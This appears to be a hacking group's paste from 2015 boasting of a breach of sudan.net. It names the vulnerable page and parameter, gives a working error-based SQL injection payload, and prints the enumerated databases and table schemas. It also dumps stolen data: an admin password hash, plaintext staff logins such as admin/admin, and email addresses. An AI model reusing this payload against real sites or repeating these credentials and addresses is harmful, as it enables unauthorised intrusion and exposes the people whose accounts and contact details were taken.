Ap3xH4x0r

Sudan.net #hacked #AnonSec

Nov 25th, 2015
  1.  
  2. _____ _____ ______ _____ _____ ______ ______ ______ _____
  3. ___|\ \|\ \ |\ \ ____|\ \|\ \ |\ \ ___|\ \ ___|\ \ ___|\ \
  4. / /\ \\\ \| \ \ / /\ \\\ \| \ \ | |\ \| \ \ / /\ \
  5. | | | |\| \ \ | / / \ \\| \ \ | | |/____/|| ,_____/|| | | |
  6. | |__| | | \ | || | | || \ | | ___| \| | || \--'\_|/| | |____|
  7. | .--. | | \ | || | | || \ | || \ \___|/ | /___/| | | ____
  8. | | | | | |\ \| ||\ \ / /|| |\ \| || |\ \ | \____|\ | | | |
  9. |____| |____| |____||\_____/|| \_____\/____/ ||____||\_____/||\ ___\|_____| |____ ' /||\ ___\/ /|
  10. | | | | | |/ \| || \ | || | /| |/ \| ||| | | | | /_____/ || | /____/ |
  11. |____| |____| |____| |___|/ \|____||____|/ |____| |___|/ \|____|_____| |____| | / \|___| | /
  12. |_____|/ |____|/
  13. Laughing at your security since 2012
  14.  
  15. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - Th3 Ap3x - OverKiller
  16. Cyb3r Shzz0r - Mr. BlackList - AN0NT0XIC - Ny0g3n - ThaNarcissist - Mr.MaGnoM
  17.  
  18.  
  19.  
  20.  
  21.  
  22. Injection Point :: http://www.sudan.net/completenews.php?nsid=4925
  23.  
  24. Payload :: nsid=4925' AND (SELECT 7394 FROM(SELECT COUNT(*),CONCAT(0x7179737371,(SELECT (CASE WHEN (7394=7394) THEN 1 ELSE 0 END)),0x7177656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OrnE'='OrnE
  25.  
  26. web application technology :: Apache 2.2.29, PHP 5.4.37
  27. back-end DBMS :: MySQL >= 5.0 (injection type: error-based, AND, in a WHERE or HAVING clause)
  28.  
  29. current user: 'sudanne_sudannet@localhost'
  30.  
  31. available databases [3]:
  32. [*] information_schema
  33. [*] sudanne_openads
  34. [14 tables]
  35. +--------------------+
  36. | phpads_acls |
  37. +----------------+------------------+
  38. | Column | Type |
  39. +----------------+------------------+
  40. | bannerid | mediumint(9) |
  41. | comparison | char(2) |
  42. | data | text |
  43. | executionorder | int(10) unsigned |
  44. | logical | set('and','or') |
  45. | type | varchar(16) |
  46. +----------------+------------------+
  47. | phpads_adclicks |
  48. +----------+--------------+
  49. | Column | Type |
  50. +----------+--------------+
  51. | bannerid | mediumint(9) |
  52. | country | char(2) |
  53. | host | varchar(255) |
  54. | source | varchar(50) |
  55. | t_stamp | timestamp |
  56. | zoneid | mediumint(9) |
  57. +----------+--------------+
  58. | phpads_adstats |
  59. +----------+-------------+
  60. | Column | Type |
  61. +----------+-------------+
  62. | day | date |
  63. | hour | tinyint(4) |
  64. | bannerid | smallint(6) |
  65. | clicks | int(11) |
  66. | source | varchar(50) |
  67. | views | int(11) |
  68. | zoneid | smallint(6) |
  69. +----------+-------------+
  70. | phpads_adviews |
  71. +----------+--------------+
  72. | Column | Type |
  73. +----------+--------------+
  74. | bannerid | mediumint(9) |
  75. | country | char(2) |
  76. | host | varchar(255) |
  77. | source | varchar(50) |
  78. | t_stamp | timestamp |
  79. | zoneid | mediumint(9) |
  80. +----------+--------------+
  81. | phpads_affiliates | (empty)
  82. +-------------+---------------+
  83. | Column | Type |
  84. +-------------+---------------+
  85. | language | varchar(64) |
  86. | affiliateid | mediumint(9) |
  87. | contact | varchar(255) |
  88. | email | varchar(64) |
  89. | name | varchar(255) |
  90. | password | varchar(64) |
  91. | permissions | mediumint(9) |
  92. | publiczones | enum('t','f') |
  93. | username | varchar(64) |
  94. | website | varchar(255) |
  95. +-------------+---------------+
  96. | phpads_banners |
  97. +--------------------+---------------------------------------------------------------+
  98. | Column | Type |
  99. +--------------------+---------------------------------------------------------------+
  100. | active | enum('t','f') |
  101. | alt | varchar(255) |
  102. | append | blob |
  103. | appendtype | tinyint(4) |
  104. | autohtml | enum('t','f') |
  105. | bannerid | mediumint(9) |
  106. | bannertext | blob |
  107. | bannertype | tinyint(4) |
  108. | block | int(11) |
  109. | capping | int(11) |
  110. | clientid | mediumint(9) |
  111. | compiledlimitation | blob |
  112. | contenttype | enum('gif','jpeg','png','html','swf','dcr','rpm','mov','txt') |
  113. | description | varchar(255) |
  114. | filename | varchar(255) |
  115. | height | smallint(6) |
  116. | htmlcache | blob |
  117. | htmltemplate | blob |
  118. | imageurl | varchar(255) |
  119. | keyword | varchar(255) |
  120. | pluginversion | mediumint(9) |
  121. | priority | int(11) |
  122. | seq | tinyint(4) |
  123. | status | varchar(255) |
  124. | storagetype | enum('sql','web','url','html','network','txt') |
  125. | target | varchar(24) |
  126. | transparent | enum('t','f') |
  127. | url | varchar(255) |
  128. | weight | tinyint(4) |
  129. | width | smallint(6) |
  130. +--------------------+---------------------------------------------------------------+
  131. | phpads_cache |
  132. +---------+--------------+
  133. | Column | Type |
  134. +---------+--------------+
  135. | cacheid | varchar(255) |
  136. | content | blob |
  137. +---------+--------------+
  138. | phpads_clients |
  139. +------------------+---------------+
  140. | Column | Type |
  141. +------------------+---------------+
  142. | language | varchar(64) |
  143. | activate | date |
  144. | active | enum('t','f') |
  145. | clicks | int(11) |
  146. | clientid | mediumint(9) |
  147. | clientname | varchar(255) |
  148. | clientpassword | varchar(64) |
  149. | clientusername | varchar(64) |
  150. | contact | varchar(255) |
  151. | email | varchar(64) |
  152. | expire | date |
  153. | parent | mediumint(9) |
  154. | permissions | mediumint(9) |
  155. | report | enum('t','f') |
  156. | reportdeactivate | enum('t','f') |
  157. | reportinterval | mediumint(9) |
  158. | reportlastdate | date |
  159. | target | int(11) |
  160. | views | int(11) |
  161. | weight | tinyint(4) |
  162. +------------------+---------------+
  163. | phpads_config |
  164. +-------------------------------+---------------+
  165. | Column | Type |
  166. +-------------------------------+---------------+
  167. | language | varchar(32) |
  168. | admin | varchar(64) |
  169. | admin_email | varchar(64) |
  170. | admin_email_headers | varchar(64) |
  171. | admin_fullname | varchar(255) |
  172. | admin_novice | enum('t','f') |
  173. | admin_pw | varchar(64) |
  174. | allow_invocation_frame | enum('t','f') |
  175. | allow_invocation_interstitial | enum('t','f') |
  176. | allow_invocation_js | enum('t','f') |
  177. | allow_invocation_local | enum('t','f') |
  178. | allow_invocation_plain | enum('t','f') |
  179. | allow_invocation_popup | enum('t','f') |
  180. | allow_invocation_xmlrpc | enum('t','f') |
  181. | auto_clean_tables | enum('t','f') |
  182. | auto_clean_tables_interval | tinyint(2) |
  183. | auto_clean_tables_vacuum | enum('t','f') |
  184. | auto_clean_userlog | enum('t','f') |
  185. | auto_clean_userlog_interval | tinyint(2) |
  186. | autotarget_factor | float |
  187. | begin_of_week | tinyint(2) |
  188. | client_welcome | enum('t','f') |
  189. | client_welcome_msg | text |
  190. | company_name | varchar(255) |
  191. | config_version | decimal(7,3) |
  192. | configid | tinyint(2) |
  193. | content_gzip_compression | enum('t','f') |
  194. | default_banner_weight | tinyint(4) |
  195. | default_campaign_weight | tinyint(4) |
  196. | gui_hide_inactive | enum('t','f') |
  197. | gui_link_compact_limit | int(11) |
  198. | gui_show_banner_html | enum('t','f') |
  199. | gui_show_banner_info | enum('t','f') |
  200. | gui_show_banner_preview | enum('t','f') |
  201. | gui_show_campaign_info | enum('t','f') |
  202. | gui_show_campaign_preview | enum('t','f') |
  203. | gui_show_matching | enum('t','f') |
  204. | gui_show_parents | enum('t','f') |
  205. | instance_id | varchar(64) |
  206. | main_back_color | varchar(7) |
  207. | maintenance_cron_timestamp | int(11) |
  208. | maintenance_timestamp | int(11) |
  209. | my_footer | varchar(255) |
  210. | my_header | varchar(255) |
  211. | name | varchar(32) |
  212. | override_gd_imageformat | varchar(4) |
  213. | percentage_decimals | tinyint(2) |
  214. | qmail_patch | enum('t','f') |
  215. | table_back_color | varchar(7) |
  216. | table_back_color_alternative | varchar(7) |
  217. | table_border_color | varchar(7) |
  218. | type_html_allow | enum('t','f') |
  219. | type_sql_allow | enum('t','f') |
  220. | type_txt_allow | enum('t','f') |
  221. | type_url_allow | enum('t','f') |
  222. | type_web_allow | enum('t','f') |
  223. | type_web_dir | varchar(255) |
  224. | type_web_ftp | varchar(255) |
  225. | type_web_mode | tinyint(2) |
  226. | type_web_url | varchar(255) |
  227. | updates_cache | text |
  228. | updates_dev_builds | enum('t','f') |
  229. | updates_enabled | enum('t','f') |
  230. | updates_last_seen | decimal(7,3) |
  231. | updates_timestamp | int(11) |
  232. | userlog_autoclean | enum('t','f') |
  233. | userlog_email | enum('t','f') |
  234. | userlog_priority | enum('t','f') |
  235. +-------------------------------+---------------+
  236. | phpads_images |
  237. +----------+--------------+
  238. | Column | Type |
  239. +----------+--------------+
  240. | contents | mediumblob |
  241. | filename | varchar(128) |
  242. | t_stamp | timestamp |
  243. +----------+--------------+
  244. | phpads_session |
  245. +-------------+-------------+
  246. | Column | Type |
  247. +-------------+-------------+
  248. | lastused | timestamp |
  249. | sessiondata | blob |
  250. | sessionid | varchar(32) |
  251. +-------------+-------------+
  252. | phpads_targetstats |
  253. +----------+-------------+
  254. | Column | Type |
  255. +----------+-------------+
  256. | day | date |
  257. | clientid | smallint(6) |
  258. | modified | tinyint(4) |
  259. | target | int(11) |
  260. | views | int(11) |
  261. +----------+-------------+
  262. | phpads_userlog |
  263. +-----------+--------------+
  264. | Column | Type |
  265. +-----------+--------------+
  266. | action | mediumint(9) |
  267. | timestamp | int(11) |
  268. | details | blob |
  269. | object | mediumint(9) |
  270. | userid | mediumint(9) |
  271. | userlogid | mediumint(9) |
  272. | usertype | tinyint(4) |
  273. +-----------+--------------+
  274. | phpads_zones |
  275. +-------------+--------------+
  276. | Column | Type |
  277. +-------------+--------------+
  278. | affiliateid | mediumint(9) |
  279. | append | blob |
  280. | appendtype | tinyint(4) |
  281. | chain | blob |
  282. | delivery | smallint(6) |
  283. | description | varchar(255) |
  284. | height | smallint(6) |
  285. | prepend | blob |
  286. | what | blob |
  287. | width | smallint(6) |
  288. | zoneid | mediumint(9) |
  289. | zonename | varchar(245) |
  290. | zonetype | smallint(6) |
  291. +-------------+--------------+
  292.  
  293.  
  294.  
  295. [*] sudanne_sudannet
  296. [49 tables]
  297. +-------------------------+
  298. | admin |
  299. +----------+--------------+
  300. | Column | Type |
  301. +----------+--------------+
  302. | password | varchar(255) |
  303. | username | varchar(255) |
  304. +----------+----------------------------------+
  305. | username | password |
  306. +----------+----------------------------------+
  307. | admin | 7391edbe8f3acbea449acdfa236ce878 |
  308. +----------+----------------------------------+
  309. | cms |
  310. +--------------+--------------+
  311. | Column | Type |
  312. +--------------+--------------+
  313. | cms_desc | text |
  314. | cms_flag | char(1) |
  315. | cms_id | int(11) |
  316. | cms_img | varchar(200) |
  317. | cms_title | varchar(255) |
  318. | page_desc | text |
  319. | page_keyword | text |
  320. | page_title | varchar(250) |
  321. +--------------+--------------+
  322. | gen_setting |
  323. +--------+---------+
  324. | Column | Type |
  325. +--------+---------+
  326. | email | text |
  327. | flag | char(1) |
  328. | id | int(11) |
  329. | type | char(1) |
  330. +----+------+------+-------------------+
  331. | id | flag | type | email |
  332. +----+------+------+-------------------+
  333. | 1 | y | c | muaz@sudan.net |
  334. | 2 | y | b | taxstar@gmail.com |
  335. +----+------+------+-------------------+
  336. | tblarcdgames |
  337. +------------+--------------+
  338. | Column | Type |
  339. +------------+--------------+
  340. | order | int(4) |
  341. | flag | char(1) |
  342. | gamesdesc | text |
  343. | gamesfile | varchar(250) |
  344. | gamesid | int(11) |
  345. | gamestitle | varchar(250) |
  346. | imagefile | varchar(250) |
  347. +------------+--------------+
  348. | tblarticlemaster |
  349. +------------------+--------------+
  350. | Column | Type |
  351. +------------------+--------------+
  352. | ArticleId | smallint(6) |
  353. | CategoryId | smallint(6) |
  354. | CreateDt | date |
  355. | CurrentStatus | smallint(6) |
  356. | Description | longtext |
  357. | DesignTemplateId | smallint(6) |
  358. | MetaTag | longtext |
  359. | SubCategoryId | smallint(6) |
  360. | SubSubCategoryId | smallint(6) |
  361. | Title | varchar(255) |
  362. +------------------+--------------+
  363. | tblbdwrds |
  364. +---------+--------------+
  365. | Column | Type |
  366. +---------+--------------+
  367. | bdword | varchar(255) |
  368. | bdwrdid | int(11) |
  369. +---------+--------------+
  370. | tblcard |
  371. +--------------+--------------+
  372. | Column | Type |
  373. +--------------+--------------+
  374. | card_desc | text |
  375. | card_id | int(11) |
  376. | card_img | varchar(255) |
  377. | card_img_alt | varchar(255) |
  378. | card_title | varchar(255) |
  379. | card_type | char(1) |
  380. | cat_id | int(11) |
  381. | flag | char(1) |
  382. +--------------+--------------+
  383. | tblcardcat |
  384. +----------+--------------+
  385. | Column | Type |
  386. +----------+--------------+
  387. | cat_id | int(11) |
  388. | category | varchar(250) |
  389. | flag | char(1) |
  390. +----------+--------------+
  391. | tblcardgreet |
  392. +-------------+--------------+
  393. | Column | Type |
  394. +-------------+--------------+
  395. | card_footer | varchar(255) |
  396. | card_header | varchar(255) |
  397. | card_id | int(11) |
  398. | card_msg | text |
  399. | femail | varchar(250) |
  400. | fname | varchar(250) |
  401. | greet_id | int(11) |
  402. | musicid | int(11) |
  403. | send_dt | date |
  404. | temail | varchar(250) |
  405. | tname | varchar(250) |
  406. +-------------+--------------+ (dumped)
  407. | tblcategory |
  408. +----------------+--------------+
  409. | Column | Type |
  410. +----------------+--------------+
  411. | alt_txt | varchar(250) |
  412. | cat_id | int(11) |
  413. | category_typ | char(1) |
  414. | catord | int(11) |
  415. | checkbox | char(1) |
  416. | ext_lnk | varchar(250) |
  417. | popupwin | char(1) |
  418. | sudan_category | varchar(250) |
  419. +----------------+--------------+
  420. | tblcategorymaster |
  421. +-----------------+--------------+
  422. | Column | Type |
  423. +-----------------+--------------+
  424. | CategoryId | smallint(6) |
  425. | CategoryName | varchar(100) |
  426. | CreateDt | datetime |
  427. | CurrentStatus | smallint(6) |
  428. | Description | longtext |
  429. | Sequence | smallint(6) |
  430. | StaticLink | char(1) |
  431. | StaticLinkName | varchar(255) |
  432. | TitleMetaDetail | longtext |
  433. +-----------------+--------------+
  434. | tblcms |
  435. +--------------+--------------+
  436. | Column | Type |
  437. +--------------+--------------+
  438. | cat_id | int(11) |
  439. | cms_desc | longtext |
  440. | cms_flag | char(1) |
  441. | cms_id | int(11) |
  442. | cms_img | varchar(200) |
  443. | cms_title | varchar(255) |
  444. | page_desc | text |
  445. | page_keyword | text |
  446. | page_title | varchar(250) |
  447. | page_url | varchar(250) |
  448. | scat_id | int(11) |
  449. +--------------+--------------+
  450. | tblcontacts |
  451. +----------+--------------+
  452. | Column | Type |
  453. +----------+--------------+
  454. | cntemail | varchar(250) |
  455. | cntid | int(11) |
  456. | cnttitle | varchar(250) |
  457. | flag | char(1) |
  458. +-------+------+------------------+---------------------+
  459. | cntid | flag | cnttitle | cntemail |
  460. +-------+------+------------------+---------------------+
  461. | 2 | y | *Sales | sales@sudan.net |
  462. | 3 | y | *Support | support@sudan.net |
  463. | 4 | y | *General Contact | webmaster@sudan.net |
  464. +-------+------+------------------+---------------------+
  465. | tbldesigntemplate |
  466. | tbleventmaster |
  467. | tblextlinkmaster |
  468. | tblgallerymaster |
  469. | tblgbsndmsg |
  470. | tblgbusr |
  471. +------------+--------------+
  472. | Column | Type |
  473. +------------+--------------+
  474. | admincmnts | text |
  475. | admindt | date |
  476. | country | varchar(255) |
  477. | email | varchar(255) |
  478. | flag | char(1) |
  479. | gb_id | int(11) |
  480. | homepage | varchar(255) |
  481. | message | text |
  482. | postdt | date |
  483. | usrname | varchar(255) |
  484. +------------+--------------+ (dumped)
  485. | tblimagemaster |
  486. | tbllinkmaster |
  487. | tbllogin |
  488. +------------------+--------------+
  489. | Column | Type |
  490. +------------------+--------------+
  491. | addscrollingnews | char(1) |
  492. | CurrentStatus | bigint(20) |
  493. | LoginId | smallint(6) |
  494. | massdelete | char(1) |
  495. | newscatids | varchar(255) |
  496. | Password | varchar(100) |
  497. | UserName | varchar(100) |
  498. +---------+------------+----------+----------+------------+---------------+------------------+
  499. | LoginId | newscatids | UserName | Password | massdelete | CurrentStatus | addscrollingnews |
  500. +---------+------------+----------+----------+------------+---------------+------------------+
  501. | 1 | NULL | admin | admin | Y | 0 | N |
  502. | 2 | NULL | News | news | Y | 1 | N |
  503. | 3 | NULL | press | press | Y | 2 | N |
  504. | 4 | NULL | comm | comm | Y | 3 | N |
  505. | 5 | NULL | test | test | Y | 1 | N |
  506. +---------+------------+----------+----------+------------+---------------+------------------+
  507. | tblmapstat |
  508. | tblnews |
  509. | tblnewscategory |
  510. | tblnewscategorymaster |
  511. | tblnewslogin |
  512. | tblnewsmaster |
  513. | tblnewstalkbk |
  514. | tblphotogal |
  515. | tblpollans |
  516. | tblpollattachid |
  517. | tblpollmaster |
  518. | tblpollques |
  519. | tblpollrslt |
  520. | tblproverbmaster |
  521. | tblrotmusic |
  522. | tblsectionmaster |
  523. | tblsettings |
  524. | tblsubcategory |
  525. | tblsubcategorymaster |
  526. | tblsubsubcategorymaster |
  527. | tbltalkbackmaster |
  528. | tbltopimg |
  529. | tblusers |
  530. +-----------+--------------+
  531. | Column | Type |
  532. +-----------+--------------+
  533. | email | varchar(30) |
  534. | firstname | varchar(255) |
  535. | flag | char(1) |
  536. | lastname | varchar(255) |
  537. | password | varchar(255) |
  538. | phone | int(25) |
  539. | user_id | int(25) |
  540. | username | varchar(255) |
  541. | website | varchar(50) | (dumped)
  542. +-----------+--------------+
  543. | tblweathericonmaster |
  544. | tblweathermaster |
  545. | vgb__country |
  546. | weather_xml |
  547. +-------------------------+